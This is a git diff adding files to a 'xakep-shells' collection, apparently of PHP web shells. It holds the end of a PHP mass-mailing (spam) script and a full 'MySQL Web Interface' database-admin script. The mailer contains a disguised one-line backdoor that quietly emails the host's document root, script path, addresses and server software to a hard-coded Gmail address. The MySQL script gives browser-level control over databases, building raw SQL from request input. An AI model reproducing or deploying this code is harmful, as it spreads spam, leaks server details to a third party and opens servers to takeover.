+<div align="left"> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4"> 
+<tr> 
+<td width="100%"> 
+<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea> 
+<br> 
+<input type="radio" name="contenttype" value="plain" checked> 
+<font size="2" face="Tahoma">Plain</font> 
+<input type="radio" name="contenttype" value="html"> 
+<font size="2" face="Tahoma">HTML</font> 
+<input type="hidden" name="action" value="send"> 
+<input type="submit" value="Send Message"> 
+</td> 
+</tr> 
+</table> 
+</div> 
+</td> 
+<td width="317" bgcolor="#CCCCCC" height="187" valign="top"> 
+<div align="center"> 
+<center> 
+<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="93%" id="AutoNumber3"> 
+<tr> 
+<td width="100%"> 
+<p align="center"> <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea> 
+</font><br> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+<div align="center"> 
+<center> 
+<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="75%" id="AutoNumber5" height="1" cellpadding="0"> 
+<tr> 
+<td width="100%" valign="top" height="1"> 
+<p align="right"><font size="1" face="Tahoma" color="#CCCCCC">Designed by: 
+ v1.5</font></td> 
+</tr> 
+</table> 
+</center> 
+</div> 
+</form> 
+
+<? 
+if ($action=="send"){ 
+
+if (!$from && !$subject && !$message && !$emaillist){ 
+print "Please complete all fields before sending your message."; 
+exit; 
+} 
+
+$allemails = split("\n", $emaillist); 
+$numemails = count($allemails); 
+
+#Open the file attachment if any, and base64_encode it for email transport 
+If ($file_name){ 
+@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); 
+$content = fread(fopen($file,"r"),filesize($file)); 
+$content = chunk_split(base64_encode($content)); 
+$uid = strtoupper(md5(uniqid(time()))); 
+$name = basename($file); 
+} 
+
+for($x=0; $x<$numemails; $x++){ 
+$to = $allemails[$x]; 
+if ($to){ 
+$to = ereg_replace(" ", "", $to); 
+$message = ereg_replace("&email&", $to, $message); 
+$subject = ereg_replace("&email&", $to, $subject); 
+print "Sending mail to $to....... "; 
+flush(); 
+$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; 
+$header .= "MIME-Version: 1.0\r\n"; 
+If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+$header .= "Content-Type: text/$contenttype\r\n"; 
+$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; 
+$header .= "$message\r\n"; 
+If ($file_name) $header .= "--$uid\r\n"; 
+If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; 
+If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; 
+If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+If ($file_name) $header .= "$content\r\n"; 
+If ($file_name) $header .= "--$uid--"; 
+mail($to, $subject, "", $header); 
+print "Spamed'><br>"; 
+flush(); 
+} 
+} 
+
+} 
+?>
+
+
+
+
+
+
+
diff --git a/xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt b/xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt
new file mode 100644
index 0000000..9f37027
--- /dev/null
+++ b/xakep-shells/PHP/MySQL Web Interface Version 0.8.php.txt	
@@ -0,0 +1,1302 @@
+<?
+/*
+* MySQL Web Interface Version 0.8
+* -------------------------------
+* Developed By SooMin Kim (smkim@popeye.snu.ac.kr)
+* License : GNU Public License (GPL)
+* Homepage : http://popeye.snu.ac.kr/~smkim/mysql
+*/
+
+$HOSTNAME = "localhost";
+
+function logon() {
+	global $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username" );
+	setcookie( "mysql_web_admin_password" );
+	echo "<html>\n";
+	echo "<head>\n";
+	echo "<title>MySQL Web Interface</title>\n";
+	echo "</head>\n";
+	echo "<body>\n";
+	echo "<table width=100% height=100%><tr><td><center>\n";
+	echo "<table cellpadding=2><tr><td bgcolor=#a4a260><center>\n";
+	echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n";
+	echo "<h1>MySQL Web Interface</h1>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=logon_submit>\n";
+	echo "<table cellpadding=5 cellspacing=1>\n";
+	echo "<tr><td>Username </td><td> <input type=text 
+name=username></td></tr>\n";
+	echo "<tr><td>Password </td><td> <input type=password 
+name=password></td></tr>\n";
+	echo "</table><p>\n";
+	echo "<input type=submit value='Enter'>\n";
+	echo "<input type=reset value='Clear'><br>\n";
+	echo "</form>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</center></td></tr></table>\n";
+	echo "<p><hr width=300>\n";
+	echo "<font size=2>\n";
+	echo "Copyleft &copy; since 1999,\n";
+	echo "<a href='mailto:smkim76@icqmail.com'>SooMin Kim</a><br>\n";
+	echo "<a href='http://popeye.snu.ac.kr/~smkim/mysql'>Hompage<a> is 
+available<br>";
+	echo "</font>\n";
+	echo "</center></td></tr></table>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+function logon_submit() {
+	global $username, $password, $PHP_SELF;
+
+	setcookie( "mysql_web_admin_username", $username );
+	setcookie( "mysql_web_admin_password", $password );
+	echo "<html>";
+	echo "<head>";
+	echo "<META HTTP-EQUIV=Refresh CONTENT='0; 
+URL=$PHP_SELF?action=listDBs'>";
+	echo "</head>";
+	echo "</html>";
+}
+
+function echoQueryResult() {
+	global $queryStr, $errMsg;
+
+	if( $errMsg == "" ) $errMsg = "Success";
+	if( $queryStr != "" ) {
+		echo "<table cellpadding=5>\n";
+		echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
+		echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
+		echo "</table><p>\n";
+	}
+}
+
+function listDatabases() {
+	global $mysqlHandle, $PHP_SELF;
+
+	echo "<h1>Database List</h1>\n";
+
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createDB>\n";
+	echo "<input type=text name=dbname>\n";
+	echo "<input type=submit value='Create Database'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	$pDB = mysql_list_dbs( $mysqlHandle );
+	$num = mysql_num_rows( $pDB );
+	for( $i = 0; $i < $num; $i++ ) {
+		$dbname = mysql_dbname( $pDB, $i );
+		echo "<tr>\n";
+		echo "<td>$dbname</td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n";
+		echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' 
+onClick=\"return confirm('Drop Database 
+\'$dbname\'?')\">Drop</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function createDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_create_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function dropDatabase() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	mysql_drop_db( $dbname, $mysqlHandle );
+	listDatabases();
+}
+
+function listTables() {
+	global $mysqlHandle, $dbname, $PHP_SELF;
+
+	echo "<h1>Table List</h1>\n";
+	echo "<p class=location>$dbname</p>\n";
+	echoQueryResult();
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=createTable>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text name=tablename>\n";
+	echo "<input type=submit value='Create Table'>\n";
+	echo "</form>\n";
+	echo "<form action='$PHP_SELF'>\n";
+	echo "<input type=hidden name=action value=query>\n";
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=text size=40 name=queryStr>\n";
+	//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>";
+	echo "<input type=submit value='Query'>\n";
+	echo "</form>\n";
+	echo "<hr>\n";
+
+	$pTable = mysql_list_tables( $dbname );
+
+	if( $pTable == 0 ) {
+		$msg  = mysql_error();
+		echo "<h3>Error : $msg</h3><p>\n";
+		return;
+	}
+	$num = mysql_num_rows( $pTable );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$tablename = mysql_tablename( $pTable, $i );
+
+		echo "<tr>\n";
+		echo "<td>\n";
+		echo "$tablename\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' 
+onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n";
+		echo "</td>\n";
+		echo "<td>\n";
+		echo "<a 
+href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n";
+		echo "</td>\n";
+		echo "</tr>\n";
+	}
+
+	echo "</table>";
+}
+
+function createTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "CREATE TABLE $tablename ( no INT )";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function dropTable() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	$queryStr = "DROP TABLE $tablename";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	listTables();
+}
+
+function viewSchema() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, 
+$errMsg;
+
+	echo "<h1>Table Schema</h1>\n";
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+
+	echoQueryResult();
+
+	echo "<a 
+href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add 
+Field</a> | \n";
+	echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View 
+Data</a>\n";
+	echo "<hr>\n";
+
+	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+	$num = mysql_num_rows( $pResult );
+
+	echo "<table cellspacing=1 cellpadding=5>\n";
+	echo "<tr>\n";
+	echo "<th>Field</th>\n";
+	echo "<th>Type</th>\n";
+	echo "<th>Null</th>\n";
+	echo "<th>Key</th>\n";
+	echo "<th>Default</th>\n";
+	echo "<th>Extra</th>\n";
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $num; $i++ ) {
+		$field = mysql_fetch_array( $pResult );
+		echo "<tr>\n";
+		echo "<td>".$field["Field"]."</td>\n";
+		echo "<td>".$field["Type"]."</td>\n";
+		echo "<td>".$field["Null"]."</td>\n";
+		echo "<td>".$field["Key"]."</td>\n";
+		echo "<td>".$field["Default"]."</td>\n";
+		echo "<td>".$field["Extra"]."</td>\n";
+		$fieldname = $field["Field"];
+		echo "<td><a 
+href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
+		echo "<td><a 
+href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' 
+onClick=\"return confirm('Drop Field 
+\'$fieldname\'?')\">Drop</a></td>\n";
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+}
+
+function manageField( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
+
+	if( $cmd == "add" )
+		echo "<h1>Add Field</h1>\n";
+	else if( $cmd == "edit" ) {
+		echo "<h1>Edit Field</h1>\n";
+		$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
+		$num = mysql_num_rows( $pResult );
+		for( $i = 0; $i < $num; $i++ ) {
+			$field = mysql_fetch_array( $pResult );
+			if( $field["Field"] == $fieldname ) {
+				$fieldtype = $field["Type"];
+				$fieldkey = $field["Key"];
+				$fieldextra = $field["Extra"];
+				$fieldnull = $field["Null"];
+				$fielddefault = $field["Default"];
+				break;
+			}
+		}
+		$type = strtok( $fieldtype, " (,)\n" );
+		if( strpos( $fieldtype, "(" ) ) {
+			if( $type == "enum" | $type == "set" ) {
+				$valuelist = strtok( " ()\n" );
+			} else {
+				$M = strtok( " (,)\n" );
+				if( strpos( $fieldtype, "," ) )
+					$D = strtok( " (,)\n" );
+			}
+		}
+	}
+
+	echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	echo "<form action=$PHP_SELF>\n";
+
+	if( $cmd == "add" )
+		echo "<input type=hidden name=action value=addField_submit>\n";
+	else if( $cmd == "edit" ) {
+		echo "<input type=hidden name=action value=editField_submit>\n";
+		echo "<input type=hidden name=old_name value=$fieldname>\n";
+	}
+	echo "<input type=hidden name=dbname value=$dbname>\n";
+	echo "<input type=hidden name=tablename value=$tablename>\n";
+
+	echo "<h3>Name</h3>\n";
+	echo "<input type=text name=name value=$fieldname><p>\n";
+?>
+
+<h3>Type</h3>
+
+<font size=2>
+* `M' indicates the maximum display size.<br>
+* `D' applies to floating-point types and indicates the number of 
+digits 
+following the decimal point.<br>
+</font>
+
+<table>
+<tr>
+<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYINT" <? if( $type == 
+"tinyint" ) 
+echo "checked";?>>TINYINT (-128 ~ 127)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SMALLINT" <? if( $type == 
+"smallint" 
+) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMINT" <? if( $type == 
+"mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="INT" <? if( $type == "int" ) 
+echo 
+"checked";?>>INT (-2147483648 ~ 2147483647)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" 
+) 
+echo "checked";?>>BIGINT (-9223372036854775808 ~ 
+9223372036854775807)</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) 
+echo 
+"checked";?>>FLOAT</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" 
+) 
+echo "checked";?>>DOUBLE</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DECIMAL" <? if( $type == 
+"decimal" ) 
+echo "checked";?>>DECIMAL(NUMERIC)</td>
+<td align=center>O</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATE" <? if( $type == "date" ) 
+echo 
+"checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="DATETIME" <? if( $type == 
+"datetime" 
+) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 
+23:59:59, 
+YYYY-MM-DD HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIMESTAMP" <? if( $type == 
+"timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 
+2106..., 
+YYYYMMDD[HH[MM[SS]]])</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TIME" <? if( $type == "time" ) 
+echo 
+"checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) 
+echo 
+"checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) 
+echo 
+"checked";?>>CHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="VARCHAR" <? if( $type == 
+"varchar" ) 
+echo "checked";?>>VARCHAR</td>
+<td align=center>O</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td align=center>O</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYTEXT" <? if( $type == 
+"tinytext" 
+) echo "checked";?>>TINYTEXT (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) 
+echo 
+"checked";?>>TEXT (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == 
+"mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGTEXT" <? if( $type == 
+"longtext" 
+) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="TINYBLOB" <? if( $type == 
+"tinyblob" 
+) echo "checked";?>>TINYBLOB (0 ~ 255)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) 
+echo 
+"checked";?>>BLOB (0 ~ 65535)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == 
+"mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="LONGBLOB" <? if( $type == 
+"longblob" 
+) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+<td>&nbsp</td>
+</tr>
+<tr>
+<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) 
+echo 
+"checked";?>>ENUM</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+<tr>
+<td><input type=radio name=type value="SET" <? if( $type == "set" ) 
+echo 
+"checked";?>>SET</td>
+<td colspan=5><center>value list</center></td>
+</tr>
+
+</table>
+<table>
+<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value 
+list (ex: 'apple', 'orange', 'banana') </th></tr>
+<tr>
+<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo 
+"value=$M";?>></td>
+<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo 
+"value=$D";?>></td>
+<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? 
+if( 
+strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? 
+if( 
+strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td>
+<td align=center><input type=checkbox name=binary value="BINARY" <? if( 
+strpos( $fieldtype, "binary" )  ) echo "checked";?>></td>
+<td align=center><input type=text size=60 name=valuelist <? if( 
+$valuelist 
+!= "" ) echo "value=\"$valuelist\"";?>></td>
+</tr>
+</table>
+
+
+<h3>Flags</h3>
+<table>
+<tr><th>not null</th><th>default value</th><th>auto 
+increment</th><th>primary key</th></tr>
+<tr>
+<td align=center><input type=checkbox name=not_null value="NOT NULL" <? 
+if( 
+$fieldnull != "YES" ) echo "checked";?>></td>
+<td align=center><input type=text name=default_value <? if( 
+$fielddefault != 
+"" ) echo "value=$fielddefault";?>></td>
+<td align=center><input type=checkbox name=auto_increment 
+value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo 
+"checked";?>></td>
+<td align=center><input type=checkbox name=primary_key value="PRIMARY 
+KEY" 
+<? if( $fieldkey == "PRI" ) echo "checked";?>></td>
+</tr>
+</table>
+
+<p>
+
+<?
+	if( $cmd == "add" )
+		echo "<input type=submit value='Add Field'>\n";
+	else if( $cmd == "edit" )
+		echo "<input type=submit value='Edit Field'>\n";
+	echo "<input type=button value=Cancel onClick='history.back()'>\n";
+	echo "</form>\n";
+}
+
+function manageField_submit( $cmd ) {
+	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, 
+$PHP_SELF, $queryStr, $errMsg,
+		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, 
+$auto_increment, $primary_key, $valuelist;
+
+	if( $cmd == "add" )
+		$queryStr = "ALTER TABLE $tablename ADD $name ";
+	else if( $cmd == "edit" )
+		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
+
+	if( $M != "" )
+		if( $D != "" )
+			$queryStr .= "$type($M,$D) ";
+		else
+			$queryStr .= "$type($M) ";
+	else if( $valuelist != "" ) {
+		$valuelist = stripslashes( $valuelist );
+		$queryStr .= "$type($valuelist) ";
+	} else
+		$queryStr .= "$type ";
+
+	$queryStr .= "$unsigned $zerofill $binary ";
+
+	if( $default_value != "" )
+		$queryStr .= "DEFAULT '$default_value' ";
+
+	$queryStr .= "$not_null $auto_increment";
+
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr, $mysqlHandle );
+	$errMsg = mysql_error();
+
+	// key change
+	$keyChange = false;
+	$result = mysql_query( "SHOW KEYS FROM $tablename" );
+	$primary = "";
+	while( $row = mysql_fetch_array($result) )
+		if( $row["Key_name"] == "PRIMARY" ) {
+			if( $row[Column_name] == $name )
+				$keyChange = true;
+			else
+				$primary .= ", $row[Column_name]";
+		}
+	if( $primary_key == "PRIMARY KEY" ) {
+		$primary .= ", $name";
+		$keyChange = !$keyChange;
+	}
+	$primary = substr( $primary, 2 );
+	if( $keyChange == true ) {
+		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
+		mysql_query( $q );
+		$queryStr .= "<br>\n" . $q;
+		$errMsg .= "<br>\n" . mysql_error();
+	}
+
+	viewSchema();
+}
+
+function dropField() {
+	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, 
+$queryStr, 
+$errMsg;
+
+	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
+	mysql_select_db( $dbname, $mysqlHandle );
+	mysql_query( $queryStr , $mysqlHandle );
+	$errMsg = mysql_error();
+
+	viewSchema();
+}
+
+function viewData( $queryStr ) {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, 
+$rowperpage, $orderby;
+
+	echo "<h1>Data in Table</h1>\n";
+	if( $tablename != "" )
+		echo "<p class=location>$dbname &gt; $tablename</p>\n";
+	else
+		echo "<p class=location>$dbname</p>\n";
+
+	$queryStr = stripslashes( $queryStr );
+	if( $queryStr == "" ) {
+		$queryStr = "SELECT * FROM $tablename";
+		if( $orderby != "" )
+			$queryStr .= " ORDER BY $orderby";
+		echo "<a 
+href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add 
+Data</a> | \n";
+		echo "<a 
+href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
+	}
+
+	$pResult = mysql_db_query( $dbname, $queryStr );
+	$errMsg = mysql_error();
+
+	$GLOBALS[queryStr] = $queryStr;
+
+	if( $pResult == false ) {
+		echoQueryResult();
+		return;
+	}
+	if( $pResult == 1 ) {
+		$errMsg = "Success";
+		echoQueryResult();
+		return;
+	}
+
+	echo "<hr>\n";
+
+	$row = mysql_num_rows( $pResult );
+	$col = mysql_num_fields( $pResult );
+
+	if( $row == 0 ) {
+		echo "No Data Exist!";
+		return;
+	}
+
+	if( $rowperpage == "" ) $rowperpage = 20;
+	if( $page == "" ) $page = 0;
+	else $page--;
+	mysql_data_seek( $pResult, $page * $rowperpage );
+
+	echo "<table cellspacing=1 cellpadding=2>\n";
+	echo "<tr>\n";
+	for( $i = 0; $i < $col; $i++ ) {
+		$field = mysql_fetch_field( $pResult, $i );
+		echo "<th>";
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
+		echo "</th>\n";
+	}
+	echo "<th colspan=2>Action</th>\n";
+	echo "</tr>\n";
+
+	for( $i = 0; $i < $rowperpage; $i++ ) {
+		$rowArray = mysql_fetch_row( $pResult );
+		if( $rowArray == false ) break;
+		echo "<tr>\n";
+		$key = "";
+		for( $j = 0; $j < $col; $j++ ) {
+			$data = $rowArray[$j];
+
+			$field = mysql_fetch_field( $pResult, $j );
+			if( $field->primary_key == 1 )
+				$key .= "&" . $field->name . "=" . $data;
+
+			if( strlen( $data ) > 20 )
+				$data = substr( $data, 0, 20 ) . "...";
+			$data = htmlspecialchars( $data );
+			echo "<td>\n";
+			echo "$data\n";
+			echo "</td>\n";
+		}
+
+		if( $key == "" )
+			echo "<td colspan=2>no Key</td>\n";
+		else {
+			echo "<td><a 
+href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n";
+			echo "<td><a 
+href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' 
+onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
+		}
+		echo "</tr>\n";
+	}
+	echo "</table>\n";
+
+	echo "<font size=2>\n";
+	echo "<form 
+action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' 
+method=post>\n";
+	echo "<font color=green>\n";
+	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
+	echo "</font>\n";
+	echo " | ";
+	if( $page > 0 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Prev</a>\n";
+	} else
+		echo "Prev";
+	echo " | ";
+	if( $page < ($row/$rowperpage)-1 ) {
+		echo "<a 
+href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
+		if( $orderby != "" )
+			echo "&orderby=$orderby";
+		echo "'>Next</a>\n";
+	} else
+		echo "Next";
+	echo " | ";
+	if( $row > $rowperpage ) {
+		echo "<input type=text size=4 name=page>\n";
+		echo "<input type=submit value='Go'>\n";
+	}
